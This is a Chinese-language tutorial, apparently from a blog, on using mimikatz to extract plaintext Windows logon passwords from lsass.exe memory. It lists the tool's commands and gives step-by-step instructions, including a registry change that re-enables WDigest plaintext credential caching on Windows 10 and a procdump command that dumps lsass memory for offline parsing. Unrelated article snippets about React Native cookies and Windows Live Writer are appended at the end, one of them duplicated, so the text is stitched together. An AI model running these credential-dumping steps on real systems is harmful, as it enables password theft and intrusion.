一.程式原理
獲取到記憶體檔案 lsass.exe 程序 (它用於本地安全和登陸策略) 中儲存的明文登入密碼。
二.指令介紹
version檢視mimikatz的版本
system::user檢視當前登入的系統使用者
system::computer檢視計算機名稱
process::list列出程序
process::suspend程序名稱暫停程序
process::stop程序名稱結束程序
process::modules列出系統的核心模組及所在位置
service::list列出系統的服務
service::remove移除系統的服
service::remove移除系統的服務
service::startstop服務名稱啟動或停止服務
privilege::list列出許可權列表
privilege::enable啟用乙個或多個許可權
privilege::debug提公升許可權
nogpo::cmd開啟系統的cmd.exe
nogpo::regedit開啟系統的登錄檔
nogpo::taskmgr開啟任務管理器
ts::sessions顯示當前的會話
ts::processes顯示程序和對應的pid情況等
sekurlsa::wdigest獲取本地使用者資訊及密碼
sekurlsa::wdigest獲取kerberos使用者資訊及密碼
sekurlsa::tspkg獲取tspkg使用者資訊及密碼
sekurlsa::logonpasswords獲登陸使用者資訊及密碼
三.使用過程1.win10以下本次以實驗win7為例
① 右鍵使用管理員身份開啟
2.win10在win10內禁止在記憶體快取中儲存明文密碼
因此可以通過修改登錄檔選項,恢復明文密碼
(1)方法一:
① 管理員身份執行cmd
② 修改登錄檔
修改完之後,重新登入賬號,此時抓出來的密碼就是明文顯示
命令:reg add hklm\system\currentcontrolset\control\securityproviders\wdigest /v uselogoncredential /t reg_dword /d 1 /f
shutdown -r -t 0
④ 管理員身份執行mimikatz
⑤ 輸入命令,獲取密碼
(2)方法二:
① 修改登錄檔(與方法一基本相同)
②
shutdown -r -t 0③ 使用程式procdump抓取dup檔案
使用管理員身份開啟cmd 並在程式的目錄開啟procdump.exe
命令:procdump64.exe -accepteula -ma lsass.exe 1.dmp
④ 在通過mimikatz解析1.dup檔案
注:mimikatz已經整合至metasploit』s meterpreter,在kali中也可使用
參考文章:網路資訊保安-plo
React Native Cookie使用指南
web開發中,cookie是乙個常用工具。通常會將使用者與伺服器會話的sessionid儲存在cookie中,用以在請求中標示會話 或者將登入態token值儲存在cookie中,請求中通過cookie值校驗登入態。當我們使用react native開發應用時,是否還能像在web開發中那樣使用cook...
Windows Live Writer 使用指南
一 簡介 二 安裝配置 指定安裝目錄進行安裝,方法如下 mklink d c program files x86 windows live e microsoft windows live mklink d f 我的文件 my weblog posts f 我的博文 三 新增賬戶 1 賬戶 2 cs...
Windows Live Writer 使用指南
一 簡介 二 安裝配置 指定安裝目錄進行安裝,方法如下 mklink d c program files x86 windows live e microsoft windows live mklink d f 我的文件 my weblog posts f 我的博文 三 新增賬戶 1 賬戶 2 cs...